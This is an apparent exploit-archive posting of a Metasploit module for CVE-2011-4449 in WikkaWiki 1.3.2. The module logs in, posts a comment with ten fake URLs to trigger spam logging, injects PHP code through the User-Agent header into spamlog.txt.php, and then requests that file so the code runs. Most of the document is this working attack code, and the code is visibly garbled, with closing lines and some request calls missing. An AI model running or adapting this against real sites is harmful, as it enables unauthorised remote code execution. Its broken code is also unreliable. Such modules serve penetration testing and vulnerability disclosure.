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WikkaWiki 1.3.2 Spam Logging PHP Injection

WikkaWiki 1.3.2 Spam Logging PHP Injection
Posted May 11, 2012
Authored by EgiX, sinn3r | Site metasploit.com

This Metasploit module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the UserAgent header, and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). Please note that in order to use the injection, you must manually pick a page first that allows you to add a comment, and then set it as 'PAGE'.

tags | exploit, php
advisories | CVE-2011-4449, OSVDB-77391
SHA-256 | 979dd7941c1071466332c8564dba032aa510362e1fb22f874339cf269936c50e

WikkaWiki 1.3.2 Spam Logging PHP Injection

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# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
'Description' => %q{
This module exploits a vulnerability found in WikkaWiki. When the spam logging
feature is enabled, it is possible to inject PHP code into the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generating
10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).

Please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'PAGE'.
'License' => MSF_LICENSE,
'Author' =>
'EgiX', #Initial discovery, PoC
'sinn3r' #Metasploit
'References' =>
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http://wush.net/trac/wikka/ticket/1098']
'Payload' =>
'BadChars' => "\x00"
'DefaultOptions' =>
'ExitFunction' => "none"
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
['WikkaWiki 1.3.2 r1814', {}]
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))

OptString.new('USERNAME', [true, 'WikkaWiki username']),
OptString.new('PASSWORD', [true, 'WikkaWiki password']),
OptString.new('PAGE', [true, 'Page to inject']),
OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)

def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"

if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
return Exploit::CheckCode::Safe

# Get the cookie before we do any of that login/exploity stuff
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"

# Get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
raise RuntimeError, "#{@peer} - No cookie found, will not continue"


# Do login, and then return the cookie that contains our credential
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie

# Extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"

# Add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['USERNAME']
login['password'] = datastore['PASSWORD']
login['do_redirect'] = 'on'
login['submit'] = "Login"
login['confpassword'] = ''
login['email'] = ''

port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login

if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""

return cookie_cred

# After login, we inject the PHP payload
def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie

fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"

# Generate enough URLs to trigger spam logging
urls = ''
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"

# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'

# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
post_data = ""
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"

'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"

def exploit
@peer = "#{rhost}:#{rport}"

@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'

print_status("#{@peer} - Getting cookie")
cookie = get_cookie

print_status("#{@peer} - Logging in")
cred = login(cookie)

print_status("#{@peer} - Triggering spam logging")


For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka

Open wikka.config.php, do:
'spam_logging' => '1'
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